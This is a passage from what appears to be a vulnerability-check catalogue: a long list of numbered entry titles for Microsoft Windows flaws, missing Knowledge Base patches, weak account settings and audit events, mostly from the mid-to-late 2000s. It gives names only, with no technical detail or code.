Article 974112 update is not installed [53549] Microsoft Windows Media Player ASF file buffer overflow [53548] Microsoft Windows Knowledge Base Article 971486 update is not installed [53547] Microsoft Windows kernel exception handler denial of service [53546] Microsoft Windows kernel user mode privilege escalation [53545] Microsoft Windows kernel 64-bit truncation privilege escalation [53544] Microsoft Windows Knowledge Base Article 974455 update is not installed [53541] Microsoft Windows Knowledge Base Article 969059 update is not installed [53540] Microsoft Windows Indexing Service ActiveX control code execution [53537] Microsoft Windows Knowledge Base Article 974571 update is not installed [53536] Microsoft Windows CryptoAPI ASN.1 spoofing [53535] Microsoft Windows CryptoAPI NULL spoofing [53534] Microsoft Windows Knowledge Base Article 975254 update is not installed [53533] Microsoft Windows Knowledge Base Article 957488 update is not installed [53531] Microsoft Windows GDI+ Microsoft Office file code execution [53530] Microsoft Windows GDI+ PNG image code execution [53529] Microsoft Windows GDI+ .NET Framework API code execution [53528] Microsoft Windows GDI+ TIFF image code execution [53527] Microsoft Windows GDI+ TIFF image buffer overflow [53526] Microsoft Windows GDI+ PNG image buffer overflow [53525] Microsoft Windows GDI+ WMF image code execution [53522] Microsoft Windows Knowledge Base Article 975517 update is not installed [53517] Microsoft Windows Knowledge Base Article 975682 update is not installed [53516] Microsoft Windows Media Player audio files code execution [53514] Microsoft Windows Media Player ASF code execution [53512] Microsoft Windows Knowledge Base Article 975467 update is not installed [53511] Microsoft Windows Local Security Authority Subsystem Service (LSASS) denial of service [53090] Microsoft Windows srv2.sys code execution [52948] Microsoft Windows Knowledge Base Article 973965 update is not installed [52775] Microsoft Windows Knowledge Base Article 973812 update is not installed [52774] Microsoft Windows Media Format MP3 files code execution [52773] Microsoft Windows Media Format ASF files code execution [52771] Microsoft Windows Knowledge Base Article 971961 update is not installed [52770] Microsoft Windows Jscript code execution [52403] Microsoft Windows OpenType font engine denial of service [52137] Microsoft Windows Knowledge Base Article 969706 update is not installed [52131] Microsoft Windows Knowledge Base Article 972260 update is not installed [52128] Microsoft Windows Knowledge Base Article 967723 update is not installed [52127] Microsoft Windows TCP/IP orphaned connections denial of service [52126] Microsoft Windows TCP/IP timestamps code execution [52117] Microsoft Windows Knowledge Base Article 970927 update is not installed [52116] Microsoft Windows RDP Services Client ActiveX control buffer overflow [52115] Microsoft Windows Remote Desktop Connection RDP buffer overflow [52114] Microsoft Windows Knowledge Base Article 970957 update is not installed [52113] ASP.NET Framework component of Microsoft Windows HTTP denial of service [52111] Microsoft Windows Knowledge Base Article 969883 update is not installed [52110] Microsoft Windows Windows Internet Name Service (WINS) replication partner buffer overflow [52109] Microsoft Windows Windows Internet Name Service (WINS) replication buffer overflow [52108] Microsoft Windows Knowledge Base Article 960859 update is not installed [52107] Microsoft Windows Knowledge Base Article 971032 update is not installed [52104] Microsoft Windows telnet privilege escalation [52103] Microsoft Windows Knowledge Base Article 956844 update is not installed [52102] Microsoft Windows DHTML Editing Component ActiveX control code execution [52097] Microsoft Windows Knowledge Base Article 971557 update is not installed [52096] Microsoft Windows AVI validation integer overflow [52095] Microsoft Windows AVI code execution [52093] Microsoft Windows Knowledge Base Article 971657 update is not installed [52092] Microsoft Windows Workstation Service RPC message code execution [52089] Microsoft Windows Knowledge Base Article 973908 update is not installed [51636] Microsoft Windows Knowledge Base Article KB973346 update is not installed [51471] Microsoft Windows Knowledge Base Article 970811 update is not installed [51469] Microsoft Windows Knowledge Base Article 970710 update is not installed [51468] Microsoft Windows Wireless LAN AutoConfig service buffer overflow [51465] Microsoft Windows Knowledge Base Article 969856 update is not installed [51463] Microsoft Windows Knowledge Base Article 971633 update is not installed [51462] Microsoft Windows Knowledge Base Article 969516 update is not installed [51457] Microsoft Windows Knowledge Base Article 957638 update is not installed [51097] Microsoft Windows atapi.sys privilege escalation [51034] Microsoft PowerPoint Freelance Windows buffer overflow [50973] Microsoft Windows Server 2003 and Vista win32k.sys denial of service [50903] Microsoft Windows SPI_SETDESKWALLPAPER SystemParametersInfo denial of service [50826] Microsoft Windows Knowledge Base Article 969898 update is not installed [50798] Microsoft Windows Knowledge Base Article 970238 update is not installed [50797] Microsoft Windows RPC Marshalling Engine code execution [50795] Microsoft Windows Knowledge Base Article 969514 update is not installed [50791] Microsoft Windows Knowledge Base Article 969462 update is not installed [50783] Microsoft Windows Knowledge Base Article 968537 update is not installed [50782] Microsoft Windows desktop parameter privilege escalation [50781] Microsoft Windows system call privilege escalation [50780] Microsoft Windows kernel pointer privilege escalation [50779] Microsoft Windows kernel kernel objects privilege escalation [50778] Microsoft Windows Knowledge Base Article 963093 update is not installed [50777] Microsoft Windows Search weak security [50776] Microsoft Windows Knowledge Base Article 969897 update is not installed [50768] Microsoft Windows Knowledge Base Article 970483 update is not installed [50767] Microsoft Windows Knowledge Base Article 971055 update is not installed [50766] Microsoft Windows Knowledge Base Article 961501 update is not installed [50765] Microsoft Windows Print Spooler service privilege escalation [50763] Microsoft Windows Print Spooler service buffer overflow [50762] Microsoft Windows Knowledge Base Article 961371 update is not installed [50761] Microsoft Windows Active Directory LDAP denial of service [50760] Microsoft Windows Embedded OpenType (EOT) integer overflow [50759] Microsoft Windows 2000 Active Directory LDAP code execution [50758] Microsoft Windows EOT buffer overflow [50757] Microsoft Windows Knowledge Base Article 957632 update is not installed [50391] Microsoft Windows Media Player MID file denial of service [50281] Microsoft Windows Knowledge Base Article 967340 update is not installed [50129] Microsoft Windows gdiplus.dll PNG denial of service [49598] Microsoft Windows Knowledge Base Article 959426 update is not installed [49588] Microsoft Windows Knowledge Base Article 960477 update is not installed [49586] Microsoft Windows Knowledge Base Article 959454 update is not installed [49584] Microsoft Windows Threadpool ACL privilege escalation [49581] Microsoft Windows RPCSS privilege escalation [49578] Microsoft Windows WMI privilege escalation [49570] Microsoft Windows Knowledge Base Article 961759 update is not installed [49569] Microsoft Windows Knowledge Base Article 960803 update is not installed [49566] Microsoft Windows HTTP services certificate spoofing [49562] Microsoft Windows HTTP services integer underflow [49560] Microsoft Windows Knowledge Base Article 961373 update is not installed [49558] Microsoft Windows Knowledge Base Article 963027 update is not installed [49547] Microsoft Windows Knowledge Base Article 968557 update is not installed [49438] Microsoft Windows GDI+ EMF EmfPlusFont Object denial of service [49435] Microsoft Windows unlzh.c and unpack.c gzip code execution [49079] Microsoft Windows DNS server memory leak denial of service [48909] Microsoft Windows Knowledge Base Article 962238 update is not installed [48908] Microsoft Windows WINS server WPAD and ISATAP registration Web proxy spoofing [48907] Microsoft Windows DNS server WPAD registration Web proxy spoofing [48906] Microsoft Windows DNS server cache response spoofing [48905] Microsoft Windows DNS server query response spoofing [48392] Microsoft Windows I/O information disclosure [48326] Microsoft Windows Knowledge Base Article 960715 update is not installed [48312] Microsoft Windows Knowledge Base Article 959420 update is not installed [48311] Microsoft Windows Knowledge Base Article 961260 update not installed [48308] Microsoft Windows Knowledge Base Article 960225 update is not installed [48307] Microsoft Windows SChannel certificate spoofing [48302] Microsoft Windows Knowledge Base Article 957634 update not installed [48301] Microsoft Windows Knowledge Base Article 958690 update is not installed [48300] Microsoft Windows kernel pointer validation privilege escalation [48299] Microsoft Windows kernel handle validation privilege escalation [48298] Microsoft Windows kernel GDI validation code execution [48295] Microsoft Windows Knowledge Base Article 974378 update not installed [48189] Microsoft Windows AutoRun feature enabled [47867] Microsoft Windows .CHM file denial of service [47760] Microsoft Windows Media Player WAV file code execution [47676] Microsoft Windows Knowledge Base Article 958687 update not installed [47674] Microsoft Windows SMB NT Trans2 request code execution [47673] Microsoft Windows SMB NT Trans request buffer overflow [47672] Microsoft Windows Knowledge Base Article 959239 update not installed [47664] Microsoft Windows Media Player WAV or SND file denial of service [47428] Microsoft Windows Knowledge Base Article 960714 update is not installed [46870] Microsoft Windows Knowledge Base Article 959807 update is not installed [46869] Microsoft Windows Media Components ISATAP information disclosure [46868] Microsoft Windows Media Components SPN NTLM credentials code execution [46867] Microsoft Windows Knowledge Base Article 959349 update is not installed [46866] Microsoft Windows search-ms protocol code execution [46865] Microsoft Windows saved search file code execution [46864] Microsoft Windows Knowledge Base Article 959070 update is not installed [46861] Microsoft Windows Knowledge Base Article 958215 update not installed [46856] Microsoft Windows Knowledge Base Article 957175 update is not installed [46853] Microsoft Windows Knowledge Base Article 957173 update not installed [46844] Microsoft Windows Knowledge Base Article 956802 update is not installed [46843] Microsoft Windows GDI WMF image file buffer overflow [46842] Microsoft Windows GDI WMF image file integer overflow [46742] Microsoft Windows Vista iphlpapi.dll buffer overflow [46670] Microsoft Communicator, Office Communications Server (OCS) and Windows Live Messenger RTCP unspecified denial of service [46506] Microsoft Windows UnhookWindowsHookEx() denial of service [46385] Microsoft Windows Media Player MIDI or DAT file denial of service [46194] Microsoft Windows Knowledge Base Article 957097 update is not installed [46191] Microsoft Windows SMB NTLM credentials code execution [46190] Microsoft Windows Knowledge Base Article 932349 update is not installed [46188] Microsoft Visual Basic Windows Common ActiveX control AVI buffer overflow [46102] Microsoft Windows 2003 SP2 is not installed on the system [46101] Microsoft Windows 2003 SP1 is not installed on the system [46100] Microsoft Windows XP Service Pack 3 is not installed on the system [46099] Microsoft Windows XP Service Pack 1 is not installed on the system [46042] Microsoft Windows Knowledge Base Article 958644 update not installed [46040] Microsoft Windows Server Service RPC code execution [45857] Microsoft Windows Mobile HTC Hermes device security bypass [45719] Microsoft Windows Vista page faults denial of service [45586] Microsoft Windows Knowledge Base Article 957280 update is not installed [45585] Microsoft Windows Active Directory LDAP search buffer overflow [45582] Microsoft Windows Knowledge Base Article 956803 update is not installed [45581] Microsoft Windows Knowledge Base Article 956416 update is not installed [45578] Microsoft Windows Ancillary Function Driver privilege escalation [45572] Microsoft Windows Knowledge Base Article 9556841 update is not installed [45571] Microsoft Windows Memory Manager Virtual Address Descriptors privilege escalation [45565] Microsoft Windows Knowledge Base Article 956390 update is not installed [45561] Microsoft Windows Knowledge Base Article 957095 update is not installed [45560] Microsoft Windows SMB file name buffer underflow [45557] Microsoft Windows Knowledge Base Article 955218 update is not installed [45550] Microsoft Windows Knowledge Base Article 957699 update is not installed [45548] Microsoft Windows Knowledge Base Article 953155 update is not installed [45545] Microsoft Windows Internet Printing Protocol code execution [45544] Microsoft Windows Knowledge Base Article 954211 update is not installed [45543] Microsoft Windows kernel input privilege escalation [45542] Microsoft Windows kernel system calls privilege escalation [45541] Microsoft Windows kernel new window privilege escalation [45538] Microsoft Windows Knowledge Base Article 951071 update is not installed [45464] Microsoft Windows XP GDI+ .ICO denial of service [45463] Microsoft Windows Mobile bluetooth device name denial of service [45209] Microsoft Windows Media Player installed [45146] Microsoft Windows WRITE_ANDX SMB packet denial of service [45015] Microsoft Windows Image Aquisition Logger ActiveX control file overwrite [44727] Microsoft Windows Knowledge Base Article 956391 update not installed [44716] Microsoft Windows Knowledge Base Article 954593 update not installed [44715] Microsoft Windows GDI+ BMP header buffer overflow [44714] Microsoft Windows GDI+ WMF buffer overflow [44713] Microsoft Windows GDI+ GIF index parsing buffer overflow [44711] Microsoft Windows GDI+ EMF code execution [44710] Microsoft Windows GDI+ VML gradient buffer overflow [44708] Microsoft Windows Knowledge Base Article 955047 update not installed [44705] Microsoft Windows Knowledge Base Article 956695 update not installed [44703] Microsoft Windows Knowledge Base Article 954156 update not installed [44700] Microsoft Windows Media Encoder wmex.dll ActiveX control buffer overflow [44625] Microsoft Windows ATL Load() code execution [44423] Microsoft Windows nslookup.exe code execution [44106] Microsoft Windows Knowledge Base Article 953839 update not installed [44099] Microsoft Windows Knowledge Base Article 953838 update not installed [44092] Microsoft Windows Knowledge Base Article 954066 update not installed [44087] Microsoft Windows Knowledge Base Article 953733 update not installed [44086] Microsoft Windows IPSec policy information disclosure [44085] Microsoft Windows Knowledge Base Article 952954 update not installed [44083] Microsoft Windows Knowledge Base Article 954154 update not installed [44082] Microsoft Windows Media Player sampling rate SSPL buffer overflow [44081] Microsoft Windows Knowledge Base Article 955048 update not installed [44080] Microsoft Windows Knowledge Base Article 955617 update not installed [44079] Microsoft Windows Knowledge Base Article 950974 update not installed [43340] Microsoft Windows Knowledge Base Article 950582 update not installed [43339] Microsoft Windows Explorer saved search file code execution [43336] Microsoft Windows Knowledge Base Article 953230 update not installed [43335] Microsoft Windows DNS Server cache poisoning [43330] Microsoft Windows Knowledge Base Article 953747 update not installed [42887] Microsoft Windows Installer msiexec.exe GUID buffer overflow [42765] Apple Safari Microsoft Windows code execution [42701] Microsoft Windows Knowledge Base Article 950760 update not installed [42699] Microsoft Windows Vista speech recognition (sapi.dll) command execution [42697] Microsoft Windows Knowledge Base Article 950762 update not installed [42696] Microsoft Windows PGM fragment option denial of service [42695] Microsoft Windows PGM option length denial of service [42693] Microsoft Windows Knowledge Base Article 950759 update not installed [42691] Microsoft Windows Knowledge Base Article 949785 update not installed [42689] Microsoft Windows Knowledge Base Article 951066 update not installed bluetooth [42685] Microsoft Windows Knowledge Base Article 951376 update not installed [42684] Microsoft Windows Knowledge Base Article 948745 update not installed [42682] Microsoft Windows Bluetooth SDP code execution [42677] Microsoft Windows Knowledge Base Article 955702 update not installed [42676] Microsoft Windows Messenger ActiveX control information disclosure [42675] Microsoft Windows Knowledge Base Article 951698 update not installed [42674] Microsoft Windows DirectX SAMI buffer overflow [42672] Microsoft Windows Knowledge Base Article 953235 update not installed [42668] Microsoft Windows Active Directory LDAP request denial of service [42358] Microsoft Windows I2O Utility Filter driver (i2omgmt.sys) code execution [42334] Microsoft Windows CE JPEG and GIF code execution [42109] Microsoft Windows Knowledge Base Article 952044 update not installed [42103] Microsoft Windows Knowledge Base Article 951208 update not installed [42101] Microsoft Windows Knowledge Base Article 951207 update not installed [42095] Microsoft Windows Knowledge Base Article 950749 update not installed [41880] Microsoft Windows MSDTC privilege escalation [41481] Microsoft Windows Knowledge Base Article 945553 update not installed [41480] Microsoft Windows DNS client spoofing [41477] Microsoft Windows Knowledge Base Article 947864 update not installed [41473] Microsoft Windows Knowledge Base Article 948590 update not installed [41472] Microsoft Windows GDI EMF filename parameter buffer overflow [41471] Microsoft Windows GDI EMF and WMF header buffer overflow [41470] Microsoft Windows Knowledge Base Article 941693 update not installed [41469] Microsoft Windows kernel usermode privilege escalation [41465] Microsoft Windows Knowledge Base Article 948881 update not installed [41463] Microsoft Windows Knowledge Base Article 941203 update not installed [41453] Microsoft Windows Knowledge Base Article 949032 update not installed [41448] Microsoft Windows Knowledge Base Article 950183 update not installed [41349] Microsoft Windows AutoPlay NoDriveTypeAutoRun weak security [40937] Microsoft Windows Knowledge Base Article 815495 update not installed [40889] Microsoft Windows Knowledge Base Article 949030 update not installed [40886] Microsoft Windows Knowledge Base Article 949031 update not installed [40879] Microsoft Windows Knowledge Base Article 949029 update not installed [40693] Microsoft Windows Video Controller ActiveX Library for streaming video (msvidctl.dll) buffer overflow [40103] Microsoft Windows Knowledge Base Article 946538 update not installed [40102] Microsoft Windows Active Directory LDAP request denial of service [40101] Microsoft Windows Knowledge Base Article 947077 update not installed [40099] Microsoft Windows Knowledge Base Article 946456 update not installed [40098] Microsoft Windows Vista DHCP denial of service [40097] Microsoft Windows Knowledge Base Article 947081 update not installed [40094] Microsoft Windows Knowledge Base Article 947085 update not installed [40091] Microsoft Windows Knowledge Base Article 944533 update not installed [40078] Microsoft Windows Knowledge Base Article 947108 update not installed [40063] Microsoft Windows Knowledge Base Article 946026 update not installed [40062] Microsoft Windows WebDAV Mini-Redirector buffer overflow [40059] Microsoft Windows Knowledge Base Article 944338 update not installed [40056] Microsoft Windows VBScript and JScript engines code execution [40048] Microsoft Windows Knowledge Base Article 947890 update not installed [40043] Microsoft Windows OLE script request buffer overflow [39453] Microsoft Windows TCP/IP Source Specific Multicasting (SSM) MLDv2 buffer overflow [39452] Microsoft Windows TCP/IP Source Specific Multicasting (SSM) IGMPv3 buffer overflow [39254] Microsoft Windows TCP/IP ICMP denial of service [39238] Microsoft Windows Knowledge Base Article 941644 update not installed [39237] Microsoft Windows Knowledge Base Article 942831 update not installed [39236] Microsoft Windows Knowledge Base Article 943485 update not installed [39233] Microsoft Windows LSASS LPC privilege escalation [39232] Microsoft Windows Knowledge Base Article 942830 update not installed [39052] Microsoft Windows DirectX MJPEG decoder code execution [38865] Cisco Security Agent for Microsoft Windows SMB buffer overflow [38850] Microsoft Windows CryptGenRandom information disclosure [38830] Microsoft Windows Media File Format Stream Property error correction buffer overflow [38829] Microsoft Windows Media File Format Stream Property error correction and type-specific buffer overflow [38828] Microsoft Windows Media File Format audio_conceal_none buffer overflow [38827] Microsoft Windows Media File Format Degradable JPEG Media Stream buffer overflow [38797] Microsoft Windows Media Player AIFF denial of service [38730] Microsoft Windows Knowledge Base Article 943078 update not installed [38729] Microsoft Windows Vista kernel ALPC privilege escalation [38728] Microsoft Windows Knowledge Base Article 944653 update not installed [38726] Microsoft Windows Knowledge Base Article 942624 update not installed [38725] Microsoft Windows Vista SMBv2 signing code execution [38723] Microsoft Windows Knowledge Base Article 941568 update not installed [38717] Microsoft Windows Knowledge Base Article 942615 update not installed [38711] Microsoft Windows Knowledge Base Article 941569 update not installed [38315] Microsoft Windows Knowledge Base Article 943460 update not installed [37284] Microsoft Windows Macrovision secdrv.sys driver buffer overflow [37249] Microsoft Windows Mobile SMS sender field obfuscation [37226] Microsoft Windows Knowledge Base Article 815495 update not installed [36980] Microsoft Windows Explorer PNG file denial of service [36961] Microsoft Windows Explorer extended attributes multiple buffer overflows [36819] Microsoft Windows Knowledge Base Article 939653 update not installed [36812] Microsoft Windows Knowledge Base Article 941202 update not installed [36811] Microsoft Outlook Express and Windows Mail NNTP response code execution [36807] Microsoft Windows Knowledge Base Article 933729 update not installed [36806] Microsoft Windows Knowledge Base Article 941672 update not installed [36805] Microsoft Windows DNS spoofing information disclosure [36804] Microsoft Windows Knowledge Base Article 942695 update not installed [36803] Microsoft Windows RPC NTLMSSP authentication denial of service [36800] Microsoft Windows Knowledge Base Article 923810 update not installed [36799] Microsoft Windows Kodak image Viewer code execution [36662] Microsoft Windows Media Player meta file security bypass [36608] Microsoft Windows MFC ActiveX FindFile() buffer overflow [36490] Microsoft Windows Knowledge Base Article 942099 update not installed [36381] Microsoft Windows Knowledge Base Article 939778 update not installed [36378] Microsoft Windows UNIX services setuid binary privilege escalation [36376] Microsoft Windows Knowledge Base Article 941522 update not installed [35919] Microsoft Windows VML detected [35902] Microsoft Windows process scheduler denial of service [35897] Microsoft Windows Vista Weather Gadget code execution [35895] Microsoft Windows Media Player skin decompression code execution [35886] Microsoft Windows ARP request denial of service [35878] Microsoft Windows Media Player .AU file denial of service [35853] Microsoft Windows Vista kernel unspecified vulnerability [35816] Microsoft Windows Knowledge Base Article 940965 update not installed [35802] Microsoft Windows Vista Calendar ICS denial of service [35771] Microsoft Windows Vista Contacts Gadget code execution [35770] Microsoft Windows Vista Feed Headlines Gadget code execution [35766] Microsoft Windows Knowledge Base Article 937894 update not installed [35762] Microsoft Windows Knowledge Base Article 938127 update not installed [35761] Microsoft Windows VML vgx.dll buffer overflow [35760] Microsoft Windows Knowledge Base Article 937143 update not installed [35753] Microsoft Windows Knowledge Base Article 938827 update not installed [35746] Microsoft Windows Knowledge Base Article 938829 update not installed [35745] Microsoft Windows GDI WMF image code execution [35742] Microsoft Windows Knowledge Base Article 936782 update not installed [35741] Microsoft Windows Media Player skin parsing buffer overflow [35739] Microsoft Windows Knowledge Base Article 942017 update not installed [35582] Microsoft Windows URI protocol handling command execution [35538] Microsoft Windows Explorer GIF denial of service [35397] Microsoft Windows Vista USER32.DLL denial of service [35322] Microsoft Windows Vista firewall information disclosure [35219] Microsoft Windows Knowledge Base Article 936542 update is not installed [35216] Microsoft Windows Knowledge Base Article 933103 update not installed [35206] Microsoft Windows Knowledge Base Article 939373 update is not installed [35202] Microsoft Windows Knowledge Base Article 935807 update not installed [35199] Microsoft Windows Knowledge Base Article 936227 update not installed [35190] Microsoft Windows Knowledge Base Article 936548 update not installed [35183] Microsoft Windows Knowledge Base Article 937986 update not installed [35181] Microsoft Windows Knowledge Base Article 926122 update is not installed [35180] Microsoft Windows Active Directory LDAP denial of service [35179] Microsoft Windows Active Directory LDAP attribute buffer overflow [35059] Microsoft Windows TCP/IP Source Specific Multicasting (SSM) multiple buffer overflows [34743] Microsoft Windows GDI+ denial of service [34648] Microsoft Windows Knowledge Base Article 935839 update not installed [34645] Microsoft Windows Win32 API code execution [34642] Microsoft Windows Knowledge Base Article 935840 update not installed [34640] Microsoft Windows Knowledge Base Article 931212 update not installed .NET [34636] Microsoft Windows Schannel code execution [34634] Microsoft Windows Server 2003 Active Directory information disclosure [34633] Microsoft Windows Knowledge Base Article 933566 update not installed [34624] Microsoft Windows Knowledge Base Article 929123 update not installed [34623] Microsoft Windows MHTML Content-Disposition information disclosure [34622] Microsoft Windows MHTML URL redirect information disclosure [34618] Microsoft Windows Vista ACL user credentials information disclosure [34611] Microsoft Windows Knowledge Base Article 927051 update not installed [34599] Microsoft Windows Server 2003 terminal server security bypass [34444] Microsoft Windows unspecified code execution [34032] Microsoft Windows Knowledge Base Article 935966 update not installed [33959] Microsoft Windows Virtual DOS Machine (VDM) VdmpInitialize privilege escalation [33916] Microsoft Windows Knowledge Base Article 934233 update not installed [33909] Microsoft Windows Knowledge Base Article 934873 update not installed [33902] Microsoft Windows Knowledge Base Article 934232 update not installed [33891] Microsoft Windows Knowledge Base Article 931832 update not installed [33667] Microsoft Windows unspecified buffer overflow [33629] Microsoft Windows DNS Server RPC interface buffer overflow [33473] Microsoft Windows dynamic DNS update unauthorized access [33410] Microsoft Windows Vista LLTD Mapper host spoofing [33409] Microsoft Windows Vista LLTD Mapper bridge spoofing [33401] Microsoft Windows Vista LLTD Responder host spoofing [33399] Microsoft Windows Vista LLTD Mapper denial of service [33398] Microsoft Windows Vista Teredo address weak security [33396] Microsoft Windows Vista Meeting Space weak security [33395] Microsoft Windows Vista nonce spoofing [33394] Microsoft Windows Vista Neighbor Advertisements spoofing [33393] Microsoft Windows Vista ARP denial of service [33301] Microsoft Windows animated cursor (ANI) buffer overflow [33300] Microsoft Windows Vista atikmdag.sys slideshow denial of service [33272] Microsoft Windows Vista CSRSS CsrFinalizeContext privilege escalation [33271] Microsoft Windows Knowledge Base Article 931784 update not installed [33270] Microsoft Windows kernel VDM mapped memory privilege escalation [33269] Microsoft Windows Knowledge Base Article 931261 update not installed [33268] Microsoft Windows Universal Plug and Play HTTP buffer overflow [33267] Microsoft Windows Knowledge Base Article 932168 update not installed [33266] Microsoft Windows Knowledge Base Article 925902 update not installed [33264] Microsoft Windows TrueType Fonts rasterizer privilege escalation [33263] Microsoft Windows GDI color parameter buffer overflow [33261] Microsoft Windows GDI window size privilege escalation [33259] Microsoft Windows GDI EMF image buffer overflow [33258] Microsoft Windows GDI WMF image denial of service [33257] Microsoft Windows Knowledge Base Article 931768 update not installed [33244] Microsoft Windows Web Proxy Autodiscovery Protocol (WPAD) information disclosure [33225] Microsoft Windows Media File Format ASF multiple buffer overflows [33167] Microsoft Windows Vista Mail Client code execution [33118] Microsoft Windows XP winmm.dll denial of service [33117] Microsoft Windows MFC AfxOleSetEditMenu() buffer overflow [33086] Microsoft Windows Ndistapi.sys driver denial of service [33037] Microsoft Windows Explorer WMF file denial of service [32921] Microsoft Windows ole32.dll library denial of service [32808] Microsoft Windows Shell User Logon ActiveX control shgina.dll unauthorized access [32740] Microsoft Windows Knowledge Base Article 931906 update not installed [32738] Microsoft Windows Knowledge Base Article 925939 update not installed [32644] Microsoft Windows ReadDirectoryChangesW information disclosure [32419] Microsoft Windows Knowledge Base Article 932554 update not installed [32394] Microsoft Windows Mobile Internet Explorer WML page denial of service [32282] Microsoft Windows Knowledge Base Article 927802 update not installed [32280] Microsoft Windows Image Acquisition service buffer overflow [32153] Microsoft Windows permanent password detected [32116] Microsoft Windows administrator password no expiration set [32111] Microsoft Windows Knowledge Base Article 928255 update not installed [32110] Microsoft Windows Knowledge Base Article 928843 update not installed [32109] Microsoft Windows HTML Help ActiveX control code execution [32108] Microsoft Windows shell new hardware detection privilege escalation [32107] Microsoft Windows Knowledge Base Article 928090 update not installed [32104] Microsoft Windows Knowledge Base Article 929434 update not installed [32090] Microsoft Windows Knowledge Base Article 927779 update not installed [32071] Microsoft Windows Explorer AVI file denial of service [32002] Microsoft Windows Mobile Pictures and Videos JPEG denial of service [32001] Microsoft Windows Mobile Internet Explorer unspecified denial of service [31845] Microsoft Windows user account never used [31844] Microsoft Windows guest user account unchanged [31843] Microsoft Windows built-in guest account enumerated [31842] Microsoft Windows user account password unchanged [31821] Microsoft Windows time zone update for year 2007 [31288] Microsoft Windows Knowledge Base Article 929969 update not installed [31264] Microsoft Windows Knowledge Base Article 930178 update not installed [31210] Microsoft Windows Knowledge Base Article 927198 update is not installed [31199] Microsoft Windows Knowledge Base Article 921585 update is not installed [31191] Microsoft Windows Knowledge Base Article 925938 update is not installed [31176] Microsoft Windows CSRSS NtRaiseHardError() information disclosure [31085] Microsoft Windows Workstation service NetrWkstaUserEnum denial of service [31018] Microsoft Windows CSRSS MessageBox function privilege escalation [31015] Microsoft Windows Explorer WMV file denial of service [31014] Microsoft Windows Media Player MIDI file denial of service [31008] Microsoft Windows XP directory weak permission [30757] Microsoft Windows Knowledge Base Article 926121 update not installed [30756] Microsoft Windows Remote Installation Service code execution [30717] Microsoft Windows Print Spooler denial of service [30610] Microsoft Windows Knowledge Base Article 926436 update not installed [30608] Microsoft Windows Knowledge Base Article 926255 update not installed [30607] Microsoft Windows file manifest privilege escalation [30606] Microsoft Windows Knowledge Base Article 926247 update not installed [30605] Microsoft Windows SNMP service buffer overflow [30604] Microsoft Windows Knowledge Base Article 925454 update not installed [30599] Microsoft Windows Knowledge Base Article 924667 update not installed [30598] Microsoft Windows and Visual Studio MFC components RTF code execution [30597] Microsoft Windows Knowledge Base Article 923723 update not installed [30595] Microsoft Windows Knowledge Base Article 923689 update not installed [30594] Microsoft Windows Media Player ASF processing buffer overflow [30593] Microsoft Windows Knowledge Base Article 918118 update not installed [30592] Microsoft Windows and Office Rich Edit components code execution [30591] Microsoft Windows Knowledge Base Article 925674 update not installed [30586] Microsoft Windows Media Player ASX playlist buffer overflow [30553] Microsoft Windows Live Messenger emoticon denial of service [30172] Microsoft Windows Knowledge Base Article 928088 update not installed [30042] Microsoft Windows GDI kernel privilege escalation [29954] Microsoft Windows Knowledge Base Article 923980 update not installed [29953] Microsoft Windows Client Service for NetWare (CSNW) denial of service [29952] Microsoft Windows Client Service for NetWare (CSNW) buffer overflow [29950] Microsoft Windows Knowledge Base Article 920213 update is not installed [29949] Microsoft Windows Knowledge Base Article 924270 update not installed [29948] Microsoft Windows Workstation service NetpManageIPCConnect buffer overflow [29943] Microsoft Windows Knowledge Base Article 923789 update not installed [29917] Microsoft Windows XP NAT Helper ipnathlp.dll denial of service [29546] Microsoft Windows 2000/2003 user logoff initiated [29545] Microsoft Windows 2000/2003 system time changed [29544] Microsoft Windows 2000/2003 system security access removed [29543] Microsoft Windows 2000/2003 security access granted [29542] Microsoft Windows 2000/2003 SAM notification package loaded [29541] Microsoft Windows 2000/2003 primary security token issued [29540] Microsoft Windows 2000/2003 user password reset successful [29539] Microsoft Windows 2000/2003 object indirectly accessed [29538] Microsoft Windows 2000/2003 object handle duplicated [29537] Microsoft Windows 2000/2003 logon with explicit credentials success [29536] Microsoft Windows 2000/2003 logon attempt using explicit credentials unsuccessful [29535] Microsoft Windows 2000/2003 IPSEC policy agent failed [29534] Microsoft Windows 2000/2003 IPSEC policy agent disabled [29533] Microsoft Windows 2000/2003 IPSEC policy agent changed [29532] Microsoft Windows 2000/2003 IKE security association established [29531] Microsoft Windows 2000/2003 IKE quick mode association ended [29530] Microsoft Windows 2000/2003 IKE main mode association ended [29529] Microsoft Windows 2000/2003 IKE association negotiation failed [29528] Microsoft Windows 2000/2003 IKE association peer authentication failed [29527] Microsoft Windows 2000/2003 IKE association failed invalid proposal [29526] Microsoft Windows 2000/2003 IKE association failed authentication parameters [29525] Microsoft Windows 2000/2003 DPAPI master key backup attempted [29524] Microsoft Windows 2000/2003 DPAPI key recovery attempted [29523] Microsoft Windows 2000/2003 DPAPI auditable data unprotected [29522] Microsoft Windows 2000/2003 administrative group security descriptor set [29521] Microsoft Windows 2000/2003 account name changed [29400] Microsoft Windows drmstor.dll denial of service [29373] Microsoft Windows SMB rename denial of service [29369] Microsoft Windows Knowledge Base Article 922819 update is not installed [29253] Microsoft Windows error report transmission detected [29243] Microsoft Windows Knowledge Base Article 924164 update is not installed [29236] Microsoft Windows Knowledge Base Article 924163 update is not installed [29229] Microsoft Windows Knowledge Base Article 923694 update not installed [29227] Microsoft Outlook Express Windows Address Book (WAB) buffer overflow [29226] Microsoft Windows Knowledge Base Article 924554 update is not installed [29214] Microsoft Windows Knowledge Base Article 922581 update is not installed [29211] Microsoft Windows Knowledge Base Article 924191 update is not installed [29208] Microsoft Windows Knowledge Base Article 924496 update is not installed [29205] Microsoft Windows Object Packager file extension spoofing code execution [29204] Microsoft Windows Knowledge Base Article 923414 update is not installed [29202] Microsoft Windows Knowledge Base Article 922760 update is not installed [29201] Microsoft Windows Knowledge Base Article 923191 update is not installed [29171] Microsoft Windows Knowledge Base Article 925486 update is not installed [28664] Microsoft Windows Knowledge Base Article 922770 update is not installed [28660] Microsoft Windows Knowledge Base Article 921503 update is not installed [28659] Microsoft Windows OLE Automation code execution [28656] Microsoft Windows Knowledge Base Article 924090 update not installed [28652] Microsoft Windows Knowledge Base Article 920685 update is not installed [28649] Microsoft Windows Knowledge Base Article 910729 update is not installed [28646] Microsoft Windows Knowledge Base Article 919007 update is not installed [28643] Microsoft Windows XP PGM buffer overflow [28600] Microsoft Windows winhlp32 HLP file unspecified code execution [28512] Microsoft Internet Explorer multiple Windows 2000 COM object denial of service [28474] Microsoft Windows 